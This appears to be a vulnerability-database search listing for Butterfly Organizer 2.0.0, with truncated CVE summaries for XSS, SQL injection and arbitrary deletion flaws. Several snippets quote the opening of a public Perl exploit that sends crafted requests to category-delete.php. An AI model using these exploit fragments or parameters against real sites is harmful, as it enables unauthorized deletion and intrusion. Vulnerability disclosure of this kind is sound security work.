8 matches found
Code injection
Butterfly Organizer 2.0.0 allows remote attackers to 1 delete arbitrary categories via a modified tablehere parameter to category-delete.php with the isjsconfirmed parameter set to 1, or 2 delete arbitrary accounts via the mytable parameter to delete.php...
CVE-2008-6700
CVE-2008-6700 describes multiple cross-site scripting (XSS) vulnerabilities in Butterfly Organizer 2.0.0. The flaws allow remote attackers to inject arbitrary web script or HTML via specific parameters: (1) mytable to view.php, (2) mytable to viewdb2.php, (3) tablehere to category-rename.php, and...
CVE-2008-6328
Butterfly Organizer is affected by CVE-2008-6328: an SQL injection in view.php via the id parameter could allow remote execution of arbitrary SQL commands. Affected versions include 2.0.0 and 2.0.1. OpenVAS details also describe additional input-sanitization vulnerabilities (XSS) in the same prod...
Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
No description provided by source. ====================================================================== Butterfly Organizer 2.0.0 SQL/XSS Multiple Remote Vulnerabilities ====================================================================== ,--^----------,--------,-----,-------^--, | |||||||||...
Butterfly ORGanizer 2.0.0 - Arbitrary Delete (CategoryAccount)
Butterfly ORGanizer 2.0.0 - Arbitrary Delete CategoryAccount !/usr/bin/perl -w Butterfly Organizer 2.0.0 ; $b = LWP::UserAgent-new or die "Could not initialize browser\n"; $b-agent'Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1'; $host = $ARGV0...
Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)
!/usr/bin/perl -w Butterfly Organizer 2.0.0 ; $b = LWP::UserAgent-new or die "Could not initialize browser\n"; $b-agent'Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1'; $host = $ARGV0 . "/category-delete.php?tablehere=".$cat."&isjsconfirmed=1"; $res = $b-requestHTTP::Request-newGET=$host; $answ...
Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting
====================================================================== Butterfly Organizer 2.0.0 SQL/XSS Multiple Remote Vulnerabilities ====================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground...
butterfly-delete.txt
!/usr/bin/perl -w Butterfly Organizer 2.0.0 ; $b = LWP::UserAgent-new or die "Could not initialize browser\n"; $b-agent'Mozilla/4.0 compatible; MSIE 7.0; Windows NT 5.1'; $host = $ARGV0 . "/category-delete.php?tablehere=".$cat."&isjsconfirmed=1"; $res = $b-requestHTTP::Request-newGET=$host; $answ...